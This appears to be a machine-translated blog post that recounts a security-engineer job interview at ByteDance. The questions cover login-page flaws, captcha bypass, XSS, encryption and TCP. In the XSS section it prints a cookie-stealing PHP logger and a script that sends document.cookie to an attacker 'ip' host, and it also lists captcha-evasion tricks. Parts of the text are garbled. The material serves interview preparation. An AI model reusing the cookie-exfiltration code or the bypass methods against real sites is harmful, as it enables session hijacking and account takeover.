Preface:

Some time ago, one of my friends went out for an interview again. This time, he had a clear target for the interview, which was all the departments with large business volume and core business. I went to a lot of companies, several big factories, and he said what impressed him most was byte.

After three rounds of technical and one round of HR, he finally got an Offer of 40K *18 salary.

The first round focuses on the basics of Web security, while the second and third rounds focus on the mastery of corresponding penetration techniques and business understanding of past projects. He was impressed because each round lasted more than an hour and a half, which really benefited him a lot.

He chose Byte not only because it was a core project, but also because byte’s benefits were touted as the best in the industry and its pay was among the highest in its category.

“High salary, good development and good welfare” seems to have become byteDance’s label.

And many people think dachang has a high threshold:

“Slag this double non education can not enter the big factory!”

“If you work for less than three years, you can’t enter a big factory!”

“Those who do not graduate from the major courses cannot enter the big factory!

But for me this slag this double non graduate friend, into bytes, it seems that it is not so difficult. In his words, into the factory depends on one: technical strength.

You just need good technical skills and a good performance in the interview to get an Offer.

One side

1, a login page will exist those security problems?

Weak password, blasting, SQL injection, sensitive information leakage

Which programming language are you most familiar with?

This is because we have recently learned python. Although we have learned some Java and c++ in the required courses, we feel that we are not able to speak it.

3. What have you done with Python?

Fortunately, a simple POC was written in Python last month,

4. Write common POC libraries?

Re (Regular request library), Request (Network request library)

5. How to prevent brute force cracking?

Limit login times and add multiple authentication

6. What are the ways to bypass the verification code?

Bypass the captcha. Skip the verification code to access the required page content.

The request header contains a verification code. For some sites, the captcha will be in the foreground and the captcha generated by the JS validation server will be in the request header. The request header can be retrieved and the captcha parsed out.

The session is not refreshed. Some websites directly obtain requested resources after the verification code is successfully verified. You can set a cookie and a verification code in advance. Use this vulnerability to access websites. For multithreading can not control and some website verification code regularly do not visit the failure of the problem. This can be solved by adding a timed access program

Leverage third-party plug-ins. For some sites the captcha is simpler. Contains only Arabic numerals and English letters. You can use third-party plugins to identify it. For example: Tess4J, Tesseract

Some sites’ captchas are randomly picked from libraries. For such static captcha. You can build your own static library of captcha. Make your own links to pictures and captcha answers. The mapping method of map can be used for identification.

7. The command to view the current directory in Windows?

dir

8. View the current command on Linux?

pwd

9. View the information and permissions of the current file

ls -al

10. What part of CTF is responsible for?

I play support…

11. Do YOU work out THE CTF questions independently?

Of course,

To say the least, even if you don’t go to dachang, but if you want to go further on the technology road, if you want to become a technology leader, do big systems, you have to get the basics right.

In penetration testing, port scanning, vulnerability scanning, intrusion detection, red team attack, blue team defense, etc., are all related to network protocols. Therefore, it is very important for penetration testers to learn basic knowledge, which is a necessary skill to become a great bull.

Out of 10 programmers, 10 say they have studied network security, and 9 say they understand it. But in the real interview, maybe only two or three of them can answer the relevant questions. Such as:

“What is the difference between TCP and UDP?” “What is the underlying principle of HTTPS?” “What transport and serialization protocols are used in Ali’s Dubbo framework?”

Can you answer all these questions? In fact, IT should be clear to all the partners who have participated in the interview of large companies, whether IT is domestic Internet companies or Silicon Valley IT companies, how much the interview will ask basic knowledge.

This is not hard to understand, after all, the big factory pays more attention to the basic skills of the programmer, and almost all the program operation involves network protocol, once used wrong can easily have disastrous consequences.

Here’s an example:

Many people have been troubled by “technology changes too fast and becomes obsolete”, from search engines, big data, cloud computing to artificial intelligence, blockchain… And so on. In fact, many technologies seem to be spectacular. Stripped of the coat, the essence is actually the basic knowledge and core concepts of “computer composition principles, operating systems, network protocols, data structures and algorithms”.

The way to avoid being swept away by new technologies is to master essential knowledge. They won’t get you a job any easier with “take MySQL in X days,” but it’s the knowledge that will continue to be valuable after you’re 40.

Two or three surface

What is the penetration testing process Overview of the penetration testing process

The early interaction stage, the intelligence gathering stage, the threat modeling stage, the vulnerability analysis stage, the infiltration attack stage, the post-infiltration attack stage (how to keep control and maintain access) stage, the reporting stage.

Before the attack: network check, network scan, network check

In attack: use vulnerability information to penetrate attacks and obtain permissions

After attack: post penetration maintenance attack, file copy, Trojan implantation, trace erasure

How is XSS defended

1. Filter and encode the front-end input: for example, only the specified types of characters are allowed to be entered, such as the format of the phone number, the limit of the registered user name, etc. Input check needs to be completed on the server side, and the limit completed in the front-end is easy to bypass; Filter and escape special characters;

2. Filter and encode the output: encode and escape the variable value when it is output to the front-end HTML;

3. Use HTTP-only for key cookies

Symmetric encryption Asymmetric encryption?

Symmetric encryption: encryption and decryption use the same key, key maintenance complex N (N-1) /2, is not suitable for the Internet transmission of keys, encryption and decryption efficiency is high. Used to encrypt data.

Asymmetric encryption: the public key cannot be used to generate the private key, but each user has an asymmetric key pair. It is suitable for the Internet to transmit the public key, but the encryption efficiency is low. It is used for digital signature and encryption

Where do cookies live? Can I open it?

C:\Users\ User name \AppData\Roaming\Microsoft\Windows\Cookies Tool – Folder Options – View – Remove the check box to hide the protected files you will see the Cookies folder

How does XSS steal cookies?

Attacker code:

$cookie=$_GET['cookie']; .$time=date('Y-m-d g:i:s'); .$referer=getenv('HTTP_REFERER'); .$cookietxt=fopen('cookie.txt'.'a'); . fwrite($cookietxt."time:".$time." cookie:".$cookie." referer:".$referer.""); Note the double quotation marks, error prone.. fclose($cookietxt); . ?Copy the code

The script end:

document.write('<img src="http://ip/cookie.php?
cookie='+document.cookie+'" width=0 height=0 border=0 />'); . </script>Copy the code

After obtaining the cookie, use Firebug to find the cookie, create a cookie, add the cookie, use referer to submit, no need to enter the account password directly log in!

What protection measures should be taken for the IIS server:

  1. Keep Windows Upgraded:
  2. Use the IIS Defense tool
  3. Remove the default Web site
  4. If you do not need FTP and SMTP services, uninstall them
  5. Check your admin groups and services regularly:
  6. Strictly control the write access permission of the server
  7. Set complex passwords
  8. Reduce/exclude sharing on the Web server
  9. To disable NetBIOS in TCP/IP:
  10. Blocking using TCP ports
  11. Double check *.bat and *.exe files: search *.bat once a week
  12. Managing IIS directory security:
  13. Using NTFS security:
  14. Managing User Accounts
  15. Audit your Web server:

TCP handshake protocol:

In THE TCP/IP protocol, TCP provides reliable connection service, using the three-way handshake to establish a connection.

First handshake: When establishing a connection, the client sends a SYN packet (SYN = J) to the server and enters the SYN_SEND state, waiting for confirmation from the server.

Second handshake: After receiving a SYN packet, the server must acknowledge the client’s SYN (ACK = J +1) and send a SYN packet (ACK = K). In this case, the server enters the SYN_RECV state.

Third handshake: After receiving the SYN+ACK packet from the server, the client sends an ACK packet (ACK = K +1) to the server. After the packet is sent, the client and the server enter the ESTABLISHED state to complete the three-way handshake.

How was DVWA built?

Start xAMPP (XAMPP (Apache+MySQL+PHP+PERL) is a powerful integration package for site building. Dvwa can be used in the htdocs directory of xampp by entering http://127.0.0.1/dvwa in the browser.

And owasp loopholes practice platform: sourceforge.net/projects/ow…

Can XSS login with cookies without user name and password?

Almost. Because the value of the cookie is given to the browser, the browser will use the existing cookie to access the page. If the cookie is valid, it will directly enter the page.

HR side

1. Later development planning

2. When to make functional changes.

3. How is the value of doing security services for customers reflected, and what problems are solved for customers

4. Penetration test and code audit at work

Primary — Vulnerability scanning Intermediate — Independent penetration testing Capability Advanced — code audit project

Learning roadmap

Metal surface by

Penetration kit

Network Security Primer to Advanced Book (HD PDF version)

SRC Vulnerability Summary

Web security learning video

Emergency Response Notes

[Data Collection]